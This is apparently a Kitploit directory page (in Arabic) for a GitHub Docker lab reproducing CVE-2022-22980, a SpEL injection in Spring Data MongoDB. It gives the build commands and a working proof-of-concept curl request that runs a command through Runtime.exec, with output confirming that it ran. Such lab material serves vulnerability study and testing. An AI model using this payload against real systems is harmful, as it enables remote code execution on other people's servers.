Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Spring-Data-Mongodb-Example — # بيئة PoC معزولة عبر Docker لـ CVE-2022-22980 (حقن SpEL في Spring Data MongoDB) مع استغلال عملي يوضح تنفيذ الأوامر عن بُعد عبر طلبات HTTP مصممة خصيصًا. | Kitploit
أدوات/GitHubGitHub/kuron3k0/spring-data-mongodb-example
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubkuron3k0/spring-data-mongodb-example

Spring-Data-Mongodb-Example

# بيئة PoC معزولة عبر Docker لـ CVE-2022-22980 (حقن SpEL في Spring Data MongoDB) مع استغلال عملي يوضح تنفيذ الأوامر عن بُعد عبر طلبات HTTP مصممة خصيصًا.

عرض المستودع
147منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Spring-Data-Mongodb-Example

بيئة CVE-2022-22980

بناء بيئة Docker

root@kitploit:~
docker build  -t mongo .
docker run -dit -p 6666:6666 mongo

Poc

root@kitploit:~
➜  Spring-Data-Mongodb-Example git:(main) curl 0:6666/v1/user/get -d 'id=T(java.lang.Runtime).getRuntime().exec("touch /tmp/aaaa")'
{"timestamp":"2022-07-14T01:54:10.828+00:00","status":500,"error":"Internal Server Error","path":"/v1/user/get"}
➜  Spring-Data-Mongodb-Example git:(main) docker exec -it 3a ls -la /tmp
total 4
drwxrwxrwt    5 root     root           123 Jul 14 01:54 .
drwxr-xr-x   19 root     root          4096 Jul 14 01:53 ..
-rw-r--r--    1 root     root             0 Jul 14 01:54 aaaa
تنزيل الأداة